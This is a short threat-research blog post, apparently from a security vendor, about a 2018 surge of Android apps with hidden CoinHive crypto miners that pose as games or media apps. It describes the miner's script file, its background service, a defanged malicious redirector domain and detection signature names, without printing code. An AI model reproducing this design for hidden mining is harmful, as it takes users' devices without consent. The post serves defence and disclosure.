Sudden surge in Android miner malware observed
Sonicwall Threats Research team observed a sudden spike in Android apps with hidden crypto miner functionality. Such apps masquerade themselves as legitimate apps - such as games, music or video apps but in the background they start mining cryptocurrency using the resources of the infected victim's hardware.
Malicious Android apps with mining capability have been existing already but we saw a sudden surge in such apps on January 8, 2018. With the recent popularity of crypto-currencies like Bitcoin, Ethereum and Ripple the rise in such malware apps is not surprising.
The only permission are requested by the app is the ability to access the Internet. This permission is an extremely common permission that is used by most of the Android apps. Thus on the basis of permissions alone it is difficult to flag this app as malicious.
The cryptocurrency mining script resides in the Assets folder as engine.html. This script contains the functions to start and stop the mining:
The app starts a service - CoinHiveIntentService - which monitors, starts and stops the crypto-mining on the infected device.
One of the links that is are displayed on the app after startup is a redirector to install more malicious apps:
As shown above, this site is already being flagged as malicious.
We observed a sharp rise in miner samples on January 8, 2018. The following are common among these samples:
- The code structure
- Certificate thumbprint/serial number
- Miner service - CoinHiveIntentService
- Hardcoded domain - hxxp://lp.androidapk.world/?appid=
Sonicwall Capture Labs provides protection against this threat with the following signatures:
- GAV: AndroidOS.MoneroMiner.MNR (Trojan)
- GAV: AndroidOS.CoinHack.MNR (Trojan)
Few Android samples that we observed as part of the surge:
Once the miner app starts, the CPU usage on the device increases almost reaching 100% utilization. This app however did not heat up the phone similar to another mining app that we covered earlier.